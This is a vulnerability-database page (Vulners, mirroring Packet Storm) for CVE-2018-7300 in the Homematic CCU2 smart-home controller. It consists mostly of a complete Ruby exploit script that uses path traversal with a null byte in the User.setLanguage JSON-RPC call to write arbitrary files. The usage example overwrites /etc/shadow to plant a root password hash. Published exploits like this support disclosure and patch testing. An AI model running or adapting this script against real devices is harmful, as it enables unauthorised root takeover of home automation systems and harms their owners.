Vulners
Lucene search
Homematic CCU2 2.29.23 Arbitrary File Write
🗓️ 31 Mar 2018 00:00:00Reported by Patrick MuenchType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Homematic CCU2 2.29.23 - Arbitrary File Write Exploit | 30 Mar 201800:00 | – | zdt |
 | eQ-3 AG HomeMatic CCU2 Arbitrary File Write Vulnerability | 23 Feb 201800:00 | – | cnvd |
 | CVE-2018-7300 | 22 Feb 201819:00 | – | cve |
 | CVE-2018-7300 | 22 Feb 201819:00 | – | cvelist |
 | CVE-2018-7300 | 22 Feb 201819:29 | – | nvd |
 | HomeMatic CCU2 Multiple Vulnerabilities | 23 Feb 201800:00 | – | openvas |
 | CVE-2018-7300 | 22 Feb 201819:29 | – | osv |
 | Directory traversal | 22 Feb 201819:29 | – | prion |
`#!/usr/bin/ruby
# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300
# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite
require 'net/http'
require 'net/https'
require 'uri'
require 'json'
unless ARGV.length == 3
STDOUT.puts <<-EOF
Please provide url
Usage:
write_files.rb <ip.adress> <file path> <content of the file>
Example:
write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
or
write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
EOF
exit
end
# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"
# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]
# The third argument specifies the content of the file
homematic_file_content = ARGV[2]
# define the json body for the attack
body = {
"version": "1.1",
"method": "User.setLanguage",
"params": {
"userName": "file path",
"userLang": "file content"
}
}.to_hash
# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
# define the content
body[:params][:userLang] = homematic_file_content
# split the uri to access it in a easier way
uri = URI.parse(url)
# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
# define post request
request = Net::HTTP::Post.new(uri.request_uri)
# define the content type of the http request
request.content_type = 'application/json'
# define the request body
request.body = body.to_json
# send the request to the homematic ccu2
response = http.request(request)
# print response message code and status to cli
puts 'Response code: ' + response.code + ' ' + response.message
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Mar 2018 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.12405